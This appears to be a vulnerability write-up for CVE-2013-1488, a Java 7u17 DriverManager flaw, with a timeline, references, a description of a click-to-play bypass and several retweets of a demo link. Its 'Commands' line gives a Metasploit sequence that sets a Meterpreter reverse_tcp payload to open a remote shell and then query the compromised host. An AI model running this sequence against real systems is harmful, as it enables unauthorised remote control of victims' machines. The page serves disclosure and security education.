Timeline :
Vulnerability discovered, exploited by James Forshaw during Pwn2Own 2013
Vulnerability fixed by Oracle the 2013-04-16
Details on the vulnerability provided by James Forshaw the 2013-04-19
Metasploit PoC provided the 2013-06-07
PoC provided by :
James Forshaw
juan vazquez
Reference(s) :
CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076
Oracle Java SE Critical Patch Update Advisory – April 2013
Context Information Security Pwn2Own blog post
Affected version(s) :
JSE 7 Update 17 and before
Tested on Windows XP Pro with :
JSE 7 Update 17
Description :
This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.
Commands :
use exploit/multi/browser/java_jre17_driver_manager set SRVHOST 192.168.178.36 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo
CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo – http://t.co/kVsBeZz0mj
RT @eromang: CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo http://t.co/ogBmuwz5vU
CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo: http://t.co/2NUn1Mr0Sl
Who still has Java “@eromang: CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo http://t.co/kjogoyROiq“
RT @eromang: CVE-2013-1488 Oracle Java Applet Driver Manager Vulnerability Metasploit Demo http://t.co/ogBmuwz5vU